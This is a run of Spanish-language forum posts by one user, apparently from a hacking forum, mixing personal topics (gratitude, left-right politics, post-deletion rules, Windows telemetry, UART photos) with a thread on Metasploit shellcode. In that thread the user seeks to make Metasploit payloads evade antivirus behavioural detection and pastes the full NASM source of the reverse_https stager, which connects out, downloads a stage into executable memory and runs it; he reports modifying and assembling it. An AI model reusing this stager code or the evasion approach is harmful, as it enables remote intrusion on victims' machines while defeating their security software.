Hacia tiempo que no veia artilugios nuevos  : D

Hola,

Quise hacer este post desde el desinteres para agradecer a esta comunidad por el trabajo que aqui se hace, conciente de que todo tiene su bien y su mal.

Es todo.

Gracias.

Nota: Seria de lo mas bajo hacer un post asi con la intencion de obtener algun tipo de validacion. Aunque entiendo que es dificil incluso para mi que estoy en este momento manifestandolo, encontrar sentimientos de agradecimiento a las cosas buenas (o malas) que existen. Sin un motivo de fecha especial o de busqueda alguna simplemente la de expresar el agradecimiento de la voluntad de una comunidad de personas a ayudar a otras, pues eso es lo que somos y lo que nos eleva.

PD: No estoy borracho  (broma)

Hola,

Queria tener un contacto sutil con Metasploit pero creo que sera mas que sutil. Sin embargo esto es lo ultimo que me gustaria preguntar al menos en este comienzo.

Logre manipular los shellcodes de Metasploit. Pero ahora me surge la pregunta:

Contexto: antes de dedicarme a modificar el ensamblador de las shellcodes, intente cifrar el shellcode antes de ser ejecutado. Tuve exito pero solo con analisis estaticos. El analisis de comportamiento del antivirus aun lo detectaba. Asi que ahora estoy en la tarea de modificar el shellcode por completo.

Cuando cifre el shellcode, una vez ejecutandose en memoria el antivirus detecto el stager por comportamiento. ¿Eso quiere decir que si modifico el stager para que sea indetectable, una vez el stager descargue el stage de Metasploit y lo ejecute, no va a igualmente el antivirus detectar, no el stager, pero el stage de Metasploit tambien? ¿O no es asi como funciona la cosa? Eso es lo ultimo que me tiene confundido...

¿Lo "Perfecto" seria entonces modificar un single stage entero y no un stager?

Gracias de antemano por su ayuda.

Pa' arriba, pa' abajo, cha cha cha 🤠

Hola,

Como dice el titulo... derechas e izquierdas.

Cabe mencionar que no tengo nada en contra de las "Elites" sino de como estan establecidas en este mundo.
(Las elites gobiernan, no gestionan. ¿Y pagamos para que sea asi?).

Sin embargo, me parece curioso que las elites siempre utilicen metodos que en el pasado hacian un bien y fueron augurios de esperanza en nuestra hermosa humanidad (que es hermosa).

El concepto de izquierdas y derechas en politica me parece un ejemplo de esto.

Cabe mencionar tambien que con este post tengo la intencion de unir y no de hacer controversia y dividir.

Volviendo a los metodos pasados... Para quien no lo sepa, el tema de izquierdas y derechas viene de la revolucion francesa, y representa a la izquierda como el progreso (progreso no necesariamente beneficioso, ya que tambien se puede progresar hacia el abismo), y a la derecha con la conservacion (tambien puede ser la conservacion del abismo).

Queria hacer conciencia y llamar a la reflexion de como estos terminos se utilizan para poder categorizar a un pueblo y asi dividirlo en partes que sean mas, precisamente, "categorizables".

Se ve en el pais en el que vivo actualmente, como en la clase politica utilizan este metodo para actuar a voluntad de la clase en si y no del pueblo, porque el pueblo no esta unido.

Lo que vengo a preguntar es:

¿Eres de izquierdas o de derechas?
¿Por que?
¿Estarian tus ideologias en orden si no fuera porque te consideras como tal?

IMPORTANTE

Ignorare totalmente y llamo a ignorar cualquier comentario o insinuacion al irrespeto o a la ironia.

Si no eres capaz de aceptar la ideologia del otro, ¿Como esperas que el otro acepte la tuya?
Un soldado ve a su enemigo y se dice a si mismo, "No quiero acabar con su vida, pero el quiere acabar con la mia". En seguida jala el gatillo.

Un ejemplo de un mensaje ironico podria ser:

Por supuesto que soy de izquierdas/derechas. Ni que fuera tonto.

En el terreno ideologico es comun encontrar fanaticos, y la unica solucion al fanatismo es el respeto. El respeto a lo ajeno y principalmente el respeto a la realidad, que en cualquier momento puede ser diferente a nuestras mas intimas creencias (y deseos)...

La primera victima: La "informacion descentralizada" (eufemismo)

Respecto al tema de la mejor politica de eliminacion de posts, yo creo que los problemas que se presentan son:

- Un usuario puede eliminar el contenido de un post, lo cual es tecnicamente eliminar el post; sin embargo no puede efectivamente borrar el post en si. Supongo que se mantiene un log del contenido de los posts en el sistema del foro, y por eso da igual se que borren los contenidos, pero en ese caso quedamos en la misma (no es mejor dejar el post vacio en el foro).
- Un usuario puede eliminar el contenido cuando le han dado respuestas valiosas, dañando el contenido de la informacion.

Hay una forma en la que esto se puede solucionar definitivamente y creo que es sujeta a comparacion con la bastante ingeniosa idea planteada por el compañero Daniel:

En vez de dar un maximo de tiempo para eliminar los posts, seria mejor no poder eliminar un post que tiene una respuesta. De esta forma, un post vacio puede ser eliminado y tiene sentido mientras esta vacio. De otro modo, en el caso de haber tenido una respuesta, un post no deberia poder ni eliminarse ni modificarse.

¿Que tal eso?

Hola : D

Deberias ser mas especifico. Creo que no se entiende exactamente que tipo de consejo o ayuda estas buscando.

Me pongo un poco paranoico a veces.

¿Cuales son los datos "Required-only" que envia Windows a Microsoft cuando seleccionas que datos de "Diagnostico" (Todos sabemos que de diagnostico no tienen nada) queremos que Win10/11 envie a Microsoft?

¿Envia tus archivos, tus cookies, configuraciones, fondos de pantalla...? ¿Que envia?

Solo espero que no envie mi historial 😳

No vayan a encontrar mi receta favorita de pasta con tomate.  

Saludos.  

---

PD: Descargue el visor de datos de diagnostico y no encontre que enviara nada interesante mas alla de comportamientos del svchost.exe. No se hasta donde pueda llegar eso.

BloodSharp, gracias por responder.

ANTES DE CONTINUAR, LEER LO QUE PUSE DE ULTIMO (BAJAR)

El problema que hallo con ese metodo, es que no se como aplicarlo a la shellcode de Metasploit, porque no se en donde la suite mete a lo que le llama LHOST y LPORT. No veo ningun espacio.

Esta es la shellcode de reverse_https (stager, de arquitectura x86):

;-----------------------------------------------------------------------------;
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
; Version: 1.0 (24 July 2009)
; Size: 274 bytes
; Build: >build.py stager_reverse_tcp_nx
;-----------------------------------------------------------------------------;
 
[BITS 32]
[ORG 0]
 
  cld                    ; Clear the direction flag.
  call start             ; Call start, this pushes the address of 'api_call' onto the stack.
%include "./src/block/block_api.asm"
start:                   ;
  pop ebp                ; pop off the address of 'api_call' for calling later.
%define ENABLE_SSL 1
%include "./src/block/block_reverse_http.asm"
  ; By here we will have performed the reverse_tcp connection and EDI will be our socket.
 

./src/block/block_api.asm:

 ;-----------------------------------------------------------------------------;
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
; Compatible: NT4 and newer
; Architecture: x86
; Size: 140 bytes
;-----------------------------------------------------------------------------;
 
[BITS 32]
 
; Input: The hash of the API to call and all its parameters must be pushed onto stack.
; Output: The return value from the API call will be in EAX.
; Clobbers: EAX, ECX and EDX (ala the normal stdcall calling convention)
; Un-Clobbered: EBX, ESI, EDI, ESP and EBP can be expected to remain un-clobbered.
; Note: This function assumes the direction flag has allready been cleared via a CLD instruction.
; Note: This function is unable to call forwarded exports.
 
api_call:
  pushad                     ; We preserve all the registers for the caller, bar EAX and ECX.
  mov ebp, esp               ; Create a new stack frame
  xor edx, edx               ; Zero EDX
  mov edx, [fs:edx+0x30]     ; Get a pointer to the PEB
  mov edx, [edx+0xc]         ; Get PEB->Ldr
  mov edx, [edx+0x14]        ; Get the first module from the InMemoryOrder module list
next_mod:                    ;
  mov esi, [edx+0x28]        ; Get pointer to modules name (unicode string)
  movzx ecx, word [edx+0x26] ; Set ECX to the length we want to check
  xor edi, edi               ; Clear EDI which will store the hash of the module name
loop_modname:                ;
  xor eax, eax               ; Clear EAX
  lodsb                      ; Read in the next byte of the name
  cmp al, 'a'                ; Some versions of Windows use lower case module names
  jl not_lowercase           ;
  sub al, 0x20               ; If so normalise to uppercase
not_lowercase:               ;
  ror edi, 0xd               ; Rotate right our hash value
  add edi, eax               ; Add the next byte of the name
  dec ecx
  jnz loop_modname           ; Loop until we have read enough
  ; We now have the module hash computed
  push edx                   ; Save the current position in the module list for later
  push edi                   ; Save the current module hash for later
  ; Proceed to iterate the export address table,
  mov edx, [edx+0x10]        ; Get this modules base address
  mov eax, [edx+0x3c]        ; Get PE header
  add eax, edx               ; Add the modules base address
  mov eax, [eax+0x78]        ; Get export tables RVA
  test eax, eax              ; Test if no export address table is present
  jz get_next_mod1           ; If no EAT present, process the next module
  add eax, edx               ; Add the modules base address
  push eax                   ; Save the current modules EAT
  mov ecx, [eax+0x18]        ; Get the number of function names
  mov ebx, [eax+0x20]        ; Get the rva of the function names
  add ebx, edx               ; Add the modules base address
  ; Computing the module hash + function hash
get_next_func:               ;
  test ecx, ecx              ; Changed from jecxz to accomodate the larger offset produced by random jmps below
  jz get_next_mod            ; When we reach the start of the EAT (we search backwards), process the next module
  dec ecx                    ; Decrement the function name counter
  mov esi, [ebx+ecx*4]       ; Get rva of next module name
  add esi, edx               ; Add the modules base address
  xor edi, edi               ; Clear EDI which will store the hash of the function name
  ; And compare it to the one we want
loop_funcname:               ;
  xor eax, eax               ; Clear EAX
  lodsb                      ; Read in the next byte of the ASCII function name
  ror edi, 0xd               ; Rotate right our hash value
  add edi, eax               ; Add the next byte of the name
  cmp al, ah                 ; Compare AL (the next byte from the name) to AH (null)
  jne loop_funcname          ; If we have not reached the null terminator, continue
  add edi, [ebp-8]           ; Add the current module hash to the function hash
  cmp edi, [ebp+0x24]        ; Compare the hash to the one we are searchnig for
  jnz get_next_func          ; Go compute the next function hash if we have not found it
  ; If found, fix up stack, call the function and then value else compute the next one...
  pop eax                    ; Restore the current modules EAT
  mov ebx, [eax+0x24]        ; Get the ordinal table rva
  add ebx, edx               ; Add the modules base address
  mov cx, [ebx+2*ecx]        ; Get the desired functions ordinal
  mov ebx, [eax+0x1c]        ; Get the function addresses table rva
  add ebx, edx               ; Add the modules base address
  mov eax, [ebx+4*ecx]       ; Get the desired functions RVA
  add eax, edx               ; Add the modules base address to get the functions actual VA
  ; We now fix up the stack and perform the call to the desired function...
finish:
  mov [esp+0x24], eax        ; Overwrite the old EAX value with the desired api address for the upcoming popad
  pop ebx                    ; Clear off the current modules hash
  pop ebx                    ; Clear off the current position in the module list
  popad                      ; Restore all of the callers registers, bar EAX, ECX and EDX which are clobbered
  pop ecx                    ; Pop off the origional return address our caller will have pushed
  pop edx                    ; Pop off the hash value our caller will have pushed
  push ecx                   ; Push back the correct return value
  jmp eax                    ; Jump into the required function
  ; We now automagically return to the correct caller...
get_next_mod:                ;
  pop eax                    ; Pop off the current (now the previous) modules EAT
get_next_mod1:               ;
  pop edi                    ; Pop off the current (now the previous) modules hash
  pop edx                    ; Restore our position in the module list
  mov edx, [edx]             ; Get the next module
  jmp next_mod               ; Process this module

./src/block/block_reverse_http.asm:

;-----------------------------------------------------------------------------;
; Author: HD Moore
; Compatible: Confirmed Windows 7, Windows 2008 Server, Windows XP SP1, Windows SP3, Windows 2000
; Known Bugs: Incompatible with Windows NT 4.0, buggy on Windows XP Embedded (SP1)
; Version: 1.0
;-----------------------------------------------------------------------------;
[BITS 32]
 
%ifdef ENABLE_SSL
%define HTTP_OPEN_FLAGS ( 0x80000000 | 0x04000000 | 0x00400000 | 0x00200000 | 0x00000200 | 0x00800000 | 0x00002000 | 0x00001000 )
  ;0x80000000 | ; INTERNET_FLAG_RELOAD
  ;0x04000000 | ; INTERNET_NO_CACHE_WRITE
  ;0x00400000 | ; INTERNET_FLAG_KEEP_CONNECTION
  ;0x00200000 | ; INTERNET_FLAG_NO_AUTO_REDIRECT
  ;0x00000200 | ; INTERNET_FLAG_NO_UI
  ;0x00800000 | ; INTERNET_FLAG_SECURE
  ;0x00002000 | ; INTERNET_FLAG_IGNORE_CERT_DATE_INVALID
  ;0x00001000   ; INTERNET_FLAG_IGNORE_CERT_CN_INVALID
%else
%define HTTP_OPEN_FLAGS ( 0x80000000 | 0x04000000 | 0x00400000 | 0x00200000 | 0x00000200 )
  ;0x80000000 | ; INTERNET_FLAG_RELOAD
  ;0x04000000 | ; INTERNET_NO_CACHE_WRITE
  ;0x00400000 | ; INTERNET_FLAG_KEEP_CONNECTION
  ;0x00200000 | ; INTERNET_FLAG_NO_AUTO_REDIRECT
  ;0x00000200   ; INTERNET_FLAG_NO_UI
%endif
 
; Input: EBP must be the address of 'api_call'.
; Output: EDI will be the socket for the connection to the server
; Clobbers: EAX, ESI, EDI, ESP will also be modified (-0x1A0)
load_wininet:
  push 0x0074656e        ; Push the bytes 'wininet',0 onto the stack.
  push 0x696e6977        ; ...
  push esp               ; Push a pointer to the "wininet" string on the stack.
  push 0x0726774C        ; hash( "kernel32.dll", "LoadLibraryA" )
  call ebp               ; LoadLibraryA( "wininet" )
 
set_retry:
  push byte 8           ; retry 8 times should be enough
  pop edi
  xor ebx, ebx           ; push 8 zeros ([1]-[8])
  mov ecx, edi
push_zeros:
  push ebx
  loop push_zeros
 
internetopen:
                         ; DWORD dwFlags [1]
                         ; LPCTSTR lpszProxyBypass (NULL) [2]
                         ; LPCTSTR lpszProxyName (NULL) [3]
                         ; DWORD dwAccessType (PRECONFIG = 0) [4]
                         ; LPCTSTR lpszAgent (NULL) [5]
  push 0xA779563A        ; hash( "wininet.dll", "InternetOpenA" )
  call ebp
 
internetconnect:
                         ; DWORD_PTR dwContext (NULL) [6]
                         ; dwFlags [7]
  push byte 3            ; DWORD dwService (INTERNET_SERVICE_HTTP)
  push ebx               ; password (NULL)
  push ebx               ; username (NULL)
  push dword 4444        ; PORT
  call got_server_uri    ; double call to get pointer for both server_uri and
server_uri:              ;  server_host; server_uri is saved in EDI for later
  db "/12345", 0x00
got_server_host:
  push eax               ; HINTERNET hInternet
  push 0xC69F8957        ; hash( "wininet.dll", "InternetConnectA" )
  call ebp
 
httpopenrequest:
                         ; dwContext (NULL) [8]
  push HTTP_OPEN_FLAGS   ; dwFlags
  push ebx               ; accept types
  push ebx               ; referrer
  push ebx               ; version
  push edi               ; server URI
  push ebx               ; method
  push eax               ; hConnection
  push 0x3B2E55EB        ; hash( "wininet.dll", "HttpOpenRequestA" )
  call ebp
  xchg esi, eax          ; save hHttpRequest in esi
 
send_request:
 
%ifdef ENABLE_SSL
; InternetSetOption (hReq, INTERNET_OPTION_SECURITY_FLAGS, &dwFlags, sizeof (dwFlags) );
set_security_options:
  push 0x00003380
    ;0x00002000 |        ; SECURITY_FLAG_IGNORE_CERT_DATE_INVALID
    ;0x00001000 |        ; SECURITY_FLAG_IGNORE_CERT_CN_INVALID
    ;0x00000200 |        ; SECURITY_FLAG_IGNORE_WRONG_USAGE
    ;0x00000100 |        ; SECURITY_FLAG_IGNORE_UNKNOWN_CA
    ;0x00000080          ; SECURITY_FLAG_IGNORE_REVOCATION
  mov eax, esp
  push byte 4            ; sizeof(dwFlags)
  push eax               ; &dwFlags
  push byte 31           ; DWORD dwOption (INTERNET_OPTION_SECURITY_FLAGS)
  push esi               ; hHttpRequest
  push 0x869E4675        ; hash( "wininet.dll", "InternetSetOptionA" )
  call ebp
 
%endif
 
httpsendrequest:
  push ebx               ; lpOptional length (0)
  push ebx               ; lpOptional (NULL)
  push ebx               ; dwHeadersLength (0)
  push ebx               ; lpszHeaders (NULL)
  push esi               ; hHttpRequest
  push 0x7B18062D        ; hash( "wininet.dll", "HttpSendRequestA" )
  call ebp
  test eax,eax
  jnz short allocate_memory
 
try_it_again:
  dec edi
  jnz send_request
 
; if we didn't allocate before running out of retries, fall through to
; failure
 
failure:
  push 0x56A2B5F0        ; hardcoded to exitprocess for size
  call ebp
 
allocate_memory:
  push byte 0x40         ; PAGE_EXECUTE_READWRITE
  push 0x1000            ; MEM_COMMIT
  push 0x00400000        ; Stage allocation (8Mb ought to do us)
  push ebx               ; NULL as we dont care where the allocation is
  push 0xE553A458        ; hash( "kernel32.dll", "VirtualAlloc" )
  call ebp               ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
 
download_prep:
  xchg eax, ebx          ; place the allocated base address in ebx
  push ebx               ; store a copy of the stage base address on the stack
  push ebx               ; temporary storage for bytes read count
  mov edi, esp           ; &bytesRead
 
download_more:
  push edi               ; &bytesRead
  push 8192              ; read length
  push ebx               ; buffer
  push esi               ; hRequest
  push 0xE2899612        ; hash( "wininet.dll", "InternetReadFile" )
  call ebp
 
  test eax,eax           ; download failed? (optional?)
  jz failure
 
  mov eax, [edi]
  add ebx, eax           ; buffer += bytes_received
 
  test eax,eax           ; optional?
  jnz download_more      ; continue until it returns 0
  pop eax                ; clear the temporary storage
 
execute_stage:
  ret                    ; dive into the stored stage address
 
got_server_uri:
  pop edi
  call got_server_host
 
server_host:
 

Intentando """"adivinar""""":

LHOST me parece que lo define en la linea:

db "/12345", 0x00

LPORT me parece que lo define en la linea:

push dword 4444

Supongo, estoy casi seguro, de que es asi.

La pregunta es:  ¿Es asi? xdddddd

Y si es asi, ¿Como lo ensamblo a binario (o elf para poder extraer el binario, aunque tomando en cuenta que block_api.asm toma acceso al TEB, no se si sea adecuado ensamblar a elf ya que el TEB es una estructura especifica de WinNT). No se que pienses de eso, BloodSharp.

---

No me fije en que ahi decia URI.

Ya logre modificarlo y ensamblarlo con exito. Funciona bien. Gracias por su ayuda.

Para el que quiera saber:

Los shellcodes en codigo fuente no forman parte integral de MSF.

Lo unico que se puede hacer es entender que hace el codigo y modificarlo a partir de eso, como decia MCKSys Argentina.

Los codigos fuente estan en formato NASM.

Un saludo.

Hola,

Ya lo tengo de vuelta,

IMPORTANTE: PERDON POR EL TAMAñO DE LAS IMAGENES, NO SE COMO AJUSTARLO.

Aqui las imagenes, rub'n:

PUERTO UART


MOTHERBOARD


BASTIDOR


MOD: Imagenes adaptadas a lo permitido